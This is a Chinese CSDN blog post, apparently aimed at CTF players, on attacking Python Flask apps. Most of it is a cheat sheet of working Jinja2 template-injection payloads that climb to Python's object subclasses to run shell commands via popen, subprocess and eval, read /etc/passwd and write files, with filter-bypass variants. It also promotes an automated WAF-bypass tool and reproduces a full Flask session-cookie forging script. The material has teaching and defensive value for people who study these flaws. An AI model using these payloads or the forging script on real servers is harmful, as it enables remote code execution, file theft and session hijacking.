代码审计-Python Flask

已于 2024-10-14 16:21:28 修改
阅读量423 收藏 7
点赞数 2
文章标签: python flask 开发语言
于 2024-10-14 16:21:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43199509/article/details/142921661
版权

1.Jinjia2模版注入
Flask是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2。jinja2是Flask作者开发的一个模板系统,起初是仿django模板的一个模板引擎,为Flask提供模板支持,由于其灵活,快速和安全等优点被广泛使用。在jinja2中,存在三种语法

表达式 {{ ... }}  
用于装载字符串、变量、函数调用等
语句 {% ... %}  
用于装载控制语句,比如if判断、for循环等
注释 {# ... #}  
用于装载一个注释,模板渲染的时候会被忽略掉

模版注入本质上是通过数组字符串类获取到Object类,然后再从Object身上获取Object的其他子类,其中有的子类可以执行命令

2.获取基类:

一:使用__base__获取
"".__class__.__base__
二:使用__bases__获取
"".__bases__[0]
三:使用__mro__获取
"".__class__.__mro__这样先查看获取到的数据,确定object类在list中的第几个
"".__class__.__mro__[1]

3.获取子类列表:

"".__class__.__base__.__subclasses__()
"".__class__.__bases__[0].__subclasses__()
"".__class__.__mro__[1].__subclasses__()

4.寻找getshell类:subprocess.Popen、site._Printer、_sitebuiltins._Printer、os.system方法

{{"".__class__.__bases__[0].__subclasses__()[num].__init__.__globals__['popen']('whoami').read()}}
{{"".__class__.__bases__[0].__subclasses__()[num].__init__.__globals__.__import__('os').popen('whoami').read()}}
num的具体数值根据shell类在subclasses中index确定(注意index是从0开启计数)

<class '_sitebuiltins._Printer'> 执行命令
{{''.__class__.__base__.__subclasses__()[80].__init__.__globals__['__builtins__'].eval("__import__('os').popen('whoami').read()")}}

<type 'file'> 读写文件,file类位置一般为40,直接调用
{{"".__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}}
{{().__class__.__base__.__subclasses__()[40]('/var/www/html/input.txt', 'w').write('hello123')}}

<class 'site._Printer'> 直接用os的popen执行命令(绕过globals)
{{"".__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}
如果system被过滤,用os的listdir读取目录+file模块读取文件:
{{().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

<class 'subprocess.Popen'> 执行命令
{{''.__class__.__mro__[1].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

<class 'warnings.catch_warnings'> 执行命令
调用eval
{{[].__class__.__base__.__subclasses__()[59].__init__['__globals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}
{{''.__class__.__base__.__subclasses__()[59].__init__.__globals__.__builtins__['__import__']('os').__dict__['popen']('ls').read()}}

# 读写文件 read(),write()
{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['__builtins__'].['file']('/etc/passwd').read()}}

调用system方法。(不包含system,可以绕过过滤system的情况)
{{[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')}}
利用commands进行命令执行
{{{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')}}

5.注入样例
[WesternCTF2018]shrine(Jinja2模板注入)
https://www.cnblogs.com/dghh/p/18311335

6.焚靖工具

pip install fenjing
python -m fenjing webui

焚靖是一个针对CTF赛事中常规Jinja SSTI题目开发的WAF检测与绕过工具。
焚靖融合了CTF赛事中常见的SSTI绕过技巧,可以灵活组合使用各类绕过技巧全自动构建payload绕过WAF。
其支持自动扫描目标网站中的form元素进行攻击,也支持手动指定payload提交方式让其自动分析并产生payload。
它还支持在攻击成功后直接返回一个模拟终端方便选手执行任意Linux Shell指令。也可以在攻击成功后生成并返回对应的payload
焚靖既可以作为命令行程序使用,也可以作为python库导入到脚本中,其还提供一个网页UI方便不熟悉命令行的选手使用。
输入命令行后直接到网页界面操作
在这里插入图片描述
7.cookie伪造
flask的session是通过加密后保存在cookie中的,有加密就需要有解密用的密钥,只要用到了flask的session模块,就一定要配置’SECRET_KEY’这个全局宏。一般设置为24位的字符。Serect-key可以通过{{config}}或读取源码的方式获得,有key以后就是可以通过flask-session-cookie-manager-master来伪造session:

import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3:  # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else:  # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface


class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e

        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if (secret_key == None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else:  # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e

        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if (secret_key == None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e

if __name__ == "__main__":
    # Args are only relevant for __main__ usage

    ## Description for help
    parser = argparse.ArgumentParser(
        description='Flask Session Cookie Decoder/Encoder',
        epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                               help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                               help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                               help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                               help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if (args.subcommand == 'encode'):
        if (args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif (args.subcommand == 'decode'):
        if (args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value, args.secret_key))
        elif (args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

伪造举例:
https://blog.csdn.net/a3320315/article/details/104272833

梦想闹钟
关注
ssrfme(flask代码审计)
weixin_52780973的博客
10-31 623
简单的flask框架代码审计
DDCTF2019-Web-homebrew event loop(python flask代码审计)
Sea_Sand息禅
06-15 1036
进入网站,有以下几个功能: 1、查看源码 2、商店购买diamonds 3、重置Session 4、回到主页 刚开始是有3 points ,一个point可以买一个diamond,下面进行源码审计: from flask import Flask, session, request, Response import urllib app = Flask(__name__) app.secret_...
应用安全 - 代码审计 - Python
weixin_30556161的博客
08-09 44
flask客户端session导致敏感信息泄露 flask验证码绕过漏洞 CodeIgniter 2.1.4 session伪造及对象注入漏洞 沙箱逃逸 转载于:https://www.cnblogs.com/AtesetEnginner/p/11327477.html...
代码审计python代码审计汇总(持续更新中)
黑战士的博客
07-14 1083
的。
python token flask_使用python/flask实现鉴权
weixin_39794734的博客
12-05 1062
上一篇文章介绍了使用JWT协议来做token认证的功能,继续装逼下去,怎样实现一个鉴权的模块?假设token认证的功能已经完成,那么设定为每次请求头部中都带上这个token。server端在每次响应请求时都要做一次token的校验,包括两个内容:token是否合法,token是否过期、是否被篡改,token内的信息是否有效用户是否有权限执行此请求在python/flash上,这个检验使用decor...
代码审计-JAVA----javaweb代码审计思路
Cc040909的博客
09-22 1301
Hibernate可以应用在任何使用JDBC的场合,既可以在Java的客户端程序使用,也可以在Servlet/JSP的Web应用中使用,最具革命意义的是,Hibernate可以在应用EJB的JavaEE架构中取代CMP,完成数据持久化的重任。2、表达式注入(一般是参数值,不过有的也有极少的是参数名,一般会有检测,如OGNL、SpEL、MVEL、EL、Fel、JST+EL等)(数据库模式--->sql语句的写法--->函数--->类--->调用层次)
代码审计-JAVA】javaweb代码审计思路
12-11 3360
代码审计-JAVA】javaweb代码审计思路
Python Flask-Security- 构建安全而强大的Web应用
qq_53058639的博客
03-04 1193
Flask-Security旨在简化Web应用的安全性管理,涵盖了用户认证、角色管理、密码重置等多个方面。通过Flask-Security,可以轻松实现强大的用户身份验证和授权管理。Flask-Security是构建安全而强大的Web应用的理想选择,为开发者提供了全面的安全解决方案。通过介绍其核心功能、基本用法和高级特性,本文想要帮助大家更深入地了解和应用这一强大的Flask扩展。在基本用法中,分享了如何配置和使用Flask-Security来实现用户认证、角色管理等基本功能。
计算机毕业设计python-Flask+vue健身房管理系统 0irx1数据可视化分析系统
QQ242219979的博客
09-11 415
Django是一个开放源码的 Web架构,它是 Python开发的,它拥有完全的架子功能。大学期间的学习时光对于我来说是美好而短暂的,在这期间我也接触了许多可爱的大学同学们,以及兢兢业业教学的老师们,在我的毕业论文即将完成之际,我想对那些曾经给予我支持,帮助,还有鼓励的同学和老师以及家人们表达我内心的无比感激之情。
企业编码管理的程序使用说明-python
06-13
2. **权限控制**:通过`Flask-Login`或`Django-Auth`等库实现用户身份验证和权限控制,确保编码管理的合规性。 总结来说,Python在企业编码管理中发挥着重要作用,从数据处理到接口开发,再到系统部署和安全防护,...
Python-Python实现反射式SO注入技术
08-12
5. **代码审计**:定期进行代码审查,查找并修复可能的安全漏洞。 了解了Python反射式SO注入的基本原理后,我们可以看到`SnakeEater-master`这个压缩包可能是一个包含示例代码或者工具的项目,用于演示或研究如何...
【人工智能学习之PaddleOCR快速上手】
Jiagym的博客
10-12 1106
在配置文件中,可以设置组建模型、优化器、损失函数、模型前后处理的参数,PaddleOCR从配置文件中读取到这些参数,进而组建出完整的训练流程,完成模型训练,在需要对模型进行优化的时,可以通过修改配置文件中的参数完成配置,使用简单且方便修改。而 L2 正则化中,添加正则化项的目的在于减少参数平方的总和。准确检测的标准是检测框与标注框的IOU大于某个阈值,正确识别的检测框中的文本与标注的文本相同。如果缺少带标注的数据,或者不想投入研发成本,建议直接调用开放的API,开放的API覆盖了目前比较常见的一些垂类。
python中zip()与zip(*)的用法解析
m0_51579041的博客
10-08 307
zip()与zip(*)的用法解析
gligen安装部署笔记
jacke121的专栏
10-08 300
gligen安装部署笔记
文本区域分割系统源码&数据集分享
lzmlzm89的博客
10-08 1384
数据集信息展示在现代计算机视觉领域,文本区域分割的研究日益受到重视,尤其是在处理文档图像和名片等场景时。为此,我们构建了一个名为“more2”的数据集,旨在为改进YOLOv8-seg模型提供丰富的训练素材,以提升其在文本区域分割任务中的表现。该数据集包含五个类别,具体包括“0”、“2”、“business-name-card”、“doc”和“wendang”,每个类别均具有独特的特征和应用场景,能够为模型的训练提供多样化的样本。
python安装第三方库的问题与解决方法
WANGWUSAN66的博客
10-10 774
大部分第三方库都是在国外网站,如果直接使用pip install 包名,下载速度会很慢,这对一些大型包是很致命的,如果下载中断则需要重头再来。安装某些包时,进行到一半出现构建wheel错误,这可能由于某些神秘的原因造成的,非常让人恼火。有些包(如rasterstats)既不能通过pip安装,在2中的网站也找不到,该怎么办?在python第三方库综合网站上搜索这个包,手动下载whl文件,下载完成后使用。解决方案:使用国内镜像(如清华镜像下载),速度很容易达到1M以上;
RWKV-CHN模型部署教程
SJJS_1的博客
10-10 1186
RWKV-x060-World-7B-v2.1-20240507-ctx4096 一号空间,RWKV 语言模型旨在通过为自动化所有事情来消除使用大型语言模型的障碍。用户所需要的就是一个只有几兆字节的轻量级可执行程序。本文将详细介绍如何实现该模型的本地部署。
JavaSE——认识异常
最新发布
wx2023_10_15的博客
10-12 943
本文主要是正在学习异常的总结,主要讲了异常的概念、体系结构、分类、处理以及捕获,还有自定义异常类
micropython中断处理程序设计-临界区
sjh2100的博客
10-08 376
代码的临界区的示例是访问多个变量,这些变量受ISR影响。若中断在对单个变量的访问间发生,则其值将会不一致。这是一种叫作”竞态条件”的问题的实例:ISR和主程序循环争相修改变量。如上所述,若在主代码中修改了Python内置类型的实例或在ISR中访问实例,则应多加注意。执行更改的代码应被视为临界区,以确保ISR运行时实例处于有效状态。这样的IRQ对IRQ(例如,堆可能被锁定)中运行的代码进行了限制,并预定一个稍后会回调的函数能够接触这些限制。在实时系统中,这可能会导致极少的、难以预测的故障。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值